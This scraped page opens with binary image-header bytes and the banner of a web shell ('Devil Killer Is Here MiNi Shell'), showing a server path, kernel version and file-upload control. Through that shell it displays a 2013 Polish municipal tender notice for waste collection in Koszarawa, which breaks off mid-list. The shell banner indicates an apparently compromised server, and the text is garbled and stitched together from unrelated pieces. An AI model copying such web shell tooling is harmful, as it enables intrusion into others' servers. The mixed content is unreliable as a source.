JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130705/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130705/262856-N-2013.html

<p class="kh_header"><b>Koszarawa: Świadczenie usługi odbierania odpadów komunalnych od nieruchomości zamieszkałych i niezamieszkałych, położonych na terenie gminy Koszarawa</b><br>
<b>Numer ogłoszenia: 262856 - 2013; data zamieszczenia: 05.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Koszarawa , Koszarawa 19, 34-332 Koszarawa, woj. śląskie, tel. 33 8639407, faks 33 8639373.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi odbierania odpadów komunalnych od nieruchomości zamieszkałych i niezamieszkałych, położonych na terenie gminy Koszarawa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi w zakresie odbierania odpadów komunalnych od nieruchomości zamieszkałych i niezamieszkałych położonych na terenie gminy Koszarawa i zagospodarowania tych odpadów. W zakresie zamówienia jest odbiór i zagospodarowanie (odzysk lub unieszkodliwienie) odpadów komunalnych przekazanych od nieruchomości zamieszkałych i niezamieszkałych położonych na terenie gminy Koszarawa, w sposób zapewniający osiągnięcie odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami oraz ograniczenie masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz ich transport do instalacji regionalnej lub instalacji zastępczej do obsługi regionu , zgodnie z zapisami: - ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach (t.j. Dz. U. z 2012 r. poz. 391 ze zm.), - uchwały Sejmiku Województwa Śląskiego nr IV.25.1.2012 z dnia 24 sierpnia 2012r. w sprawie przyjęcia Planu gospodarki odpadami dla Województwa Śląskiego 2014, oraz zgodnie z obowiązującymi w czasie trwania umowy: - uchwałą Rady Gminy Koszarawa Nr XXVIII.164.12 z dnia 28.12.2012r. w sprawie regulaminu utrzymania czystości i porządku na terenie gminy Koszarawa, - uchwałą Rady Gminy Koszarawa Nr XXXII.191.13 z dnia 30.04.2013r. w sprawie wyboru metody ustalenia opłaty za gospodarowanie odpadami komunalnymi i ustalenia stawki tej opłaty 2. Zamówienie obejmuje: Przedmiotem zamówienia jest odbiór odpadów komunalnych z nieruchomości zamieszkałych i niezamieszkałych z terenu Gminy Koszarawa oraz ich transport do instalacji regionalnej lub instalacji zastępczej do obsługi regionu - nieruchomości zamieszkałe (nieruchomość, na której zamieszkują osoby) - nieruchomości niezamieszkałe (nieruchomość, na której prowadzona jest np. działalność: gospodarcza, społeczna, publiczna, budynki rekreacyjne, budynki zamieszkałe okresowo, cmentarz itp.) Odbiorem zostaną objęte odpady: 1.zmieszane( nieselektywnie zbierane) 2.selektywnie zbierane: - szkła, - plastiki, metale, papier, - żużel - odpady wielkogabarytowe 3.a także inne odpady komunalne selektywnie zbierane niewymienione w pkt. 1 i 2, których odbieranie odbywać się będzie w punkcie selektywnego zbierania odpadów w terminach podanych w harmonogramie: - wielkogabarytowe, - odpady organiczne, - remontowo - budowlane w ilości do 1 m3 - opony w ilości do 4 szt. rocznie - odpady zielone, - przeterminowane lekarstwa, - chemikalia, w tym farby, rozpuszczalniki, oleje odpadowe itd., - zużyte baterie i akumulatory, -zużyty sprzęt elektroniczny w tym wszelkiego rodzaju lampy żarowe, halogenowe, świetlówki, inny sprzęt będący na wyposażeniu gospodarstw domowych - tekstylia, w tym ubrania, - opakowania po środkach ochrony roślin i nawozach powstających w rodzinnych gospodarstwach rolnych. Do przedmiotu zamówienia należy również: - Zapewnienie worków przeznaczonych do selektywnej zbiórki odpadów. - Zapewnienie worków przeznaczonych na odpady zmieszane - Organizacja punktu selektywnego zbierania odpadów umożliwiającego nieodpłatne przekazanie przez właścicieli nieruchomości odpadów wskazanych w punkcie 1, 2 i 3 Wykonawca zobowiązany jest wyposażyć do dnia 14 sierpnia 2013 r. aptekę na terenie gminy w specjalne oznakowane pojemniki przeznaczone do zbierania przeterminowanych leków oraz opróżniać je po zgłoszeniu. Wykonawca zobowiązany jest do zapewnienia i wyposażenia bez dodatkowych opłat, nieruchomości zamieszkałych oraz nieruchomości nie zamieszkałych, z których odbierane są odpady komunalne gromadzone w sposób selektywny i zmieszany, w kolorowe worki z folii LDPE o grubości zapewniającej wytrzymałość worków (tj. co najmniej 0,02 mm) przeznaczone na gromadzenie odpadów segregowanych a także pojemników . Na komplet worków- pojemnikówskłada się: a. worek żółty o o zabarwieniu przeźroczystym na papier, tekturę ( w tym opakowania, gazety, czasopisma itd.) o pojemności od 60 l, 80 l, 100 l, 120 l, 240 l b. worek niebieski z oznakowanym napisem SUROWCE na metal, tworzywa sztuczne o pojemności 60 l, 80 l, 100 l, 120 l, 240 l c. worek biały o zabarwieniu przeźroczystym z oznakowanym napisem SZKŁO OPAKOWANIOWE na szkło i odpady opakowaniowe ze szkła o pojemności 60l d. worek zielony z oznakowanym napisem SZKŁO KOLOROWE na szkło i odpady opakowaniowe ze szkła o pojemności 60l e) worek w kolorze czarnym o pojemności 110 l, 120 l, 240 l na odpady zmieszane. f) pojemnik na żużel o pojemności 120l. Po każdorazowym odbiorze tych odpadów wykonawca ma pozostawić worki - pojemniki w ilości odpowiadającej odebranym workom - pojemnikom. Worki - pojemniki powinny być oznaczone informacją o rodzaju gromadzonych w nich odpadów, nazwą, adresem oraz numerem telefonu Wykonawcy. Worki - pojemniki ( 1 komplet) należy przekazać właścicielowi nieruchomości (cena worków wliczona w cenę oferty) do 7 dni od dnia podpisania umowy. Wykonawca zobowiązany jest do odbierania odpadów z poszczególnych nieruchomości zgodnie z ustalonym przez Wykonawcę i zatwierdzonym przez Zamawiającego harmonogramem wywozu. Wykonawca jest obowiązany do przedstawienia harmonogramu wywozu odpadów przed podpisaniem umowy. Wszelkie zmiany harmonogramu będą wymagały zgody Zamawiającego, a Wykonawca będzie zobowiązany do dostarczenia zmienionych harmonogramów do każdej nieruchomości objętej odbiorem odpadów komunalnych. 1)Odbiór odpadów będzie dokonywany bezpośrednio z terenów nieruchomości ( worki wystawione w miejscu widocznym przed posesją) bez względu na panujące warunki atmosferyczne. Usługa obejmuje zapewnienie przez Wykonawcę dojazdu do punków trudnodostępnych (szczególnie zimą i w okresie wzmożonych opadów deszczu i śniegu) poprzez zorganizowanie środków transportu, które umożliwią odbiór odpadów z terenów trudno dostępnych. Odbiór odpadów komunalnych odbywać się będzie w sposób następujący: a) odbiór odpadów od właścicieli nieruchomości zamieszkałych - dwa razy w miesiącu, zgodnie z harmonogramem wywozu podanym przez podmiot odbierający uzgodniony przez zamawiającego, b) odbiór odpadów komunalnych od właścicieli nieruchomości nie zamieszkałych - nie rzadziej niż raz w miesiącu lub w miarę potrzeby po wypełnieniu pojemników worków zgodnie z harmonogramem wywozu podanym przez podmiot odbierający uzgodniony przez zamawiającego. c) odbiór odpadów od budynków, w których prowadzona jest działalność publiczna dwa razy w miesiącu, zgodnie z harmonogramem wywozu podanym przez podmiot odbierający uzgodniony przez zamawiającego, d) zużyty sprzęt elektryczny i elektroniczny, zużyte opony, odpady wielkogabarytowe dwa razy w roku zgodnie z harmonogramem wywozu podanym przez podmiot odbierający uzgodniony przez zamawiającego. e) popiół jeden raz w trakcie trwania umowy, f) z koszy ulicznych - nie rzadziej niż raz na tydzień g) z cmentarza w miarę potrzeby 2) Odbiór odpadów komunalnych od właścicieli nieruchomości Wykonawca powinien realizować w godzinach od 7.00-18.00. 3) Wykonawca jest zobowiązany do porządkowania terenu zanieczyszczonego odpadami komunalnymi i innymi zanieczyszczeniami wysypanymi z pojemników, kontenerów, worków, pojazdów w trakcie realizacji usługi wywozu. 4) Wykonawca jest obowiązany do realizacji reklamacji (nieodebranie z nieruchomości odpadów zgodnie z harmonogramem, niedostarczenie worków na odpady segregowane itp.) w przeciągu 36 godzin od otrzymania zawiadomienia od Zamawiającego. 5) System odbierania odpadów komunalnych obejmuje również odpady powstających w wyniku prowadzenia działalności gospodarczej. 6) Wykonawca zobowiązany jest do utworzenia i obsługi Punktu Selektywnej Zbiórki Odpadów zlokalizowanego w Koszarawie (lokalizacja zostanie wskazana przez zamawiającego) gdzie będą przyjmowane odpady komunalne: - wielkogabarytowe, - odpady organiczne, - remontowo - budowlane w ilości do 1 m3 - opony w ilości do 4 szt. rocznie - odpady zielone - przeterminowane lekarstwa, - chemikalia, w tym farby, rozpuszczalniki, oleje odpadowe itd., - zużyte baterie i akumulatory, -zużyty sprzęt elektroniczny w tym wszelkiego rodzaju lampy żarowe, halogenowe, świetlówki, inny sprzęt będący na wyposażeniu gospodarstw domowych, - tekstylia, w tym ubrania, - opakowania po środkach ochrony roślin i nawozach powstających w rodzinnych gospodarstwach rolnych. Wykonawca wyposaży PSZOK w pojemniki odpowiednie do gromadzenia wymienionych odpadów - 3 kontenery o pojemności 1,5 m3 i 2 kontenery o pojemności 5m3. Punkt Selektywnej Zbiórki Odpadów czynny będzie 1 dzień w tygodniu w godz. 8-18. ( 4x na miesiąc). Dokładne daty otwarcia PSZOK zamawiający ustali z wykonawcą i zostaną one podane do wiadomości na stronie internetowej urzędu oraz tablicy informacyjnej, a także przekazane mieszkańcom przez wykonawcę łącznie z harmonogramami wywozu odpadów. Wykonawca zobowiązany jest do opróżniania punktu selektywnego zbierania odpadów komunalnych 2 razy w miesiącu . Ilość nieruchomości terenie Gminy Koszarawa: - zamieszkałych - 720 - niezamieszkałych ( osoby przebywające okresowo) - 310 - działalności gospodarczych - 34 1 Zespół Szkolno Przedszkolny 1 Zespół Gimnazjalno Przedszkolny 1 Gminny Ośrodek Kultury w Koszarawie 1 Kościół Parafialny, Parafia pw. Św. K.Boromeusza 1 Kościół Parafialny, Parafia pw. Stygmatów św. Franciszka z Asyżu 2 Cmentarze 1 Urząd Gminy Koszarawa 1 Ośrodek Zdrowia Podana ilość nieruchomości objętych zbiórką odpadów w okresie realizacji umowy może ulec zmianie. Transport i zagospodarowanie: a. Zabezpieczenie przewożonych odpadów przed wysypaniem, b. zakaz mieszania ze sobą poszczególnych frakcji selektywnie zebranych odpadów komunalnych, c. zakaz mieszania selektywnie zebranych odpadów komunalnych ze zmieszanymi odpadami komunalnymi odbieranymi od właścicieli nieruchomości, d. przekazywanie odebranych od właścicieli nieruchomości zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania do regionalnych instalacji do przetwarzania odpadów komunalnych wynikających z Planu gospodarki odpadami dla województwa śląskiego 2014, e. przekazywanie odebranych od właścicieli nieruchomości zamieszkałych selektywnie zebranych odpadów komunalnych do instalacji odzysku i unieszkodliwiania odpadów, zgodnie z hierarchią postępowania z odpadami, o której mowa w art. 7 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r., poz. 21), f. gospodarowanie odebranymi odpadami w sposób zapewniający wywiązywanie się z powierzonych przez Zamawiającego Wykonawcy obowiązków nałożonych ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (tj. Dz. U. z 2012 r. poz. 391 ze zm.), zgodnie z rozporządzeniami wydanymi na podstawie art. 3b ust 2 i art. 3c ust. 2 ustawy tj.: - rozporządzeniem Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012 r. poz. 645), - rozporządzeniem Ministra Środowiska z dnia 25 maja 2012 r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczania masy tych odpadów (Dz. U. z 2012 r. poz. 676).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-0, 90.51.31.00-0, 34.92.84.80-0, 90.51.20.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający przewiduje obowiązek wniesienia wadium przed upływem terminu składania ofert, w wysokości 1500,00 zł. Wadium może być wniesione w jednej lub kilku następujących formach: 1) pieniądzu, 2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 3) gwarancjach bankowych, 4) gwarancjach ubezpieczeniowych, 5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.). Wadium wnoszone w pieniądzu należy wpłacać przelewem na rachunek bankowy UG Koszarawa nr 79811800020000011420000060 Bank Spółdzielczy w Jeleśni. O uznaniu przez zamawiającego, że wadium w pieniądzu wpłacono w wymaganym terminie tj. do dnia 16.07.2013r do godz. 09:00 decyduje data wpływu środka na rachunek zamawiającego. Wadium w innej formie niż pieniądz należy złożyć w formie oryginału w pokoju nr 10 w siedzibie zamawiającego, a kserokopię potwierdzoną za zgodność z oryginałem przez osobę uprawnioną do składania oświadczeń woli w imieniu wykonawcy dołączyć do oferty. Wadium wnoszone w innych formach będzie wniesione w terminie, jeżeli stosowny dokument zostanie zdeponowany u Zamawiającego przed upływem terminu składania ofert. Wykonawca, którego oferta nie zostanie zabezpieczona wadium, zostanie wykluczony z postępowania, a jego oferta uznana za odrzuconą.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że: a. posiada wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z terenu gminy Koszarawa, b. posiada zezwolenie na prowadzenie działalności w zakresie transportu i zbierania odpadów komunalnych, w tym niebezpiecznych, wydane przez właściwy organ, c. posiada wpis do rejestru podmiotów zbierających zużyty sprzęt elektryczny i elektroniczny, prowadzony przez Głównego Inspektora Ochrony Środowiska, d. posiada aktualne zezwolenie na prowadzenie działalności w zakresie odzysku lub unieszkodliwiania odpadów komunalnych lub gotowość przyjęcia odpadów komunalnych przez przedsiębiorcę prowadzącego działalność w zakresie odzysku lub unieszkodliwiania odpadów. Miejsca odzysku lub unieszkodliwiania odpadów, o których mowa wyżej powinny spełniać warunki określone w ustawie z dnia 14 grudnia 2012r. o odpadach i ustawie z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach. Ocena spełniania warunków udziału w nin. postępowaniu polegać będzie na sprawdzeniu kompletności i poprawności złożonych oświadczeń i dokumentów załączonych do oferty, według kryterium spełnia - nie spełnia. Wykonawca niespełniający któregokolwiek z warunków udziału w postępowaniu zostanie wykluczony na podstawie art. 24 ust. 1-2 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że: w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, wykonał lub wykonuje główne usługi odpowiadające swoim rodzajem usługą stanowiącym przedmiot zamówienia tj. polegające na odbieraniu zmieszanych odpadów komunalnych oraz odbieraniu odpadów segregowanych łącznie z co najmniej 1000 nieruchomości przyjmując okres świadczenia nie krótszy niż 36 kolejnych miesięcy. Ocena spełniania warunków udziału w nin. postępowaniu polegać będzie na sprawdzeniu kompletności i poprawności złożonych oświadczeń i dokumentów załączonych do oferty, według kryterium spełnia - nie spełnia. Wykonawca niespełniający któregokolwiek z warunków udziału w postępowaniu zostanie wykluczony na podstawie art. 24 ust. 1-2 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonania oceny spełniania warunku: Wykonawca musi wykazać, że: a.dysponuje pojazdami specjalistycznymi i ciężarowymi, spełniającymi wymagania techniczne określone przepisami ustawy prawo o ruchu drogowym oraz innymi przepisami szczególnymi, w ilości: - co najmniej dwa pojazdy typu śmieciarka do odbioru odpadów mokrych, zmieszanych i popiołu (w tym jedna śmieciarka małogabarytowa przystosowana do odbioru odpadów z posesji o utrudnionym dojeździe), - co najmniej dwa pojazdy do odbierania odpadów zebranych selektywnie , - co najmniej jeden pojazd do odbierania odpadów bez funkcji kompaktującej - co najmniej jeden pojazd umożliwiający odbiór odpadów z terenów trudno dostępnych. Spośród wymienionych wyżej pojazdów Zamawiający wymaga aby : - co najmniej jeden pojazd wyposażony był w dźwig hakowy lub bramowy do odbioru kontenerów, - co najmniej jeden pojazd ciężarowy przystosowany był do odbioru odpadów wielkogabarytowych i niebezpiecznych, - co najmniej jeden pojazd wyposażony był w urządzenie HDS przystosowane do odbioru pojemników typu big -bag, - co najmniej jeden pojazd był wyposażony w myjkę o zamkniętym obiegu wody przystosowany do mycia i czyszczenia pojemników w miejscu odbioru odpadów Dobór wielkości pojazdów powinien uwzględniać szerokość dróg ( czasami nawet ok. 2 m szer.) na terenie gminy i częsty brak możliwości nawracania. b. Posiada odpowiednią do przedmiotu zamówienia bazę magazynowo- transportową, usytuowaną i wyposażoną zgodnie z Rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości. Ocena spełniania warunków udziału w nin. postępowaniu polegać będzie na sprawdzeniu kompletności i poprawności złożonych oświadczeń i dokumentów załączonych do oferty, według kryterium spełnia - nie spełnia. Wykonawca niespełniający któregokolwiek z warunków udziału w postępowaniu zostanie wykluczony na podstawie art. 24 ust. 1-2 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że: a) posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości nie niższej niż 200 000 zł ; b) posiada informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. Zamawiający uzna za spełniony ten warunek jeśli wykonawca posiada wysokość posiadanych środków finansowych lub zdolność kredytową nie niższą niż 100 tys. zł. Ocena spełniania warunków udziału w nin. postępowaniu polegać będzie na sprawdzeniu kompletności i poprawności złożonych oświadczeń i dokumentów załączonych do oferty, według kryterium spełnia - nie spełnia. Wykonawca niespełniający któregokolwiek z warunków udziału w postępowaniu zostanie wykluczony na podstawie art. 24 ust. 1-2 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

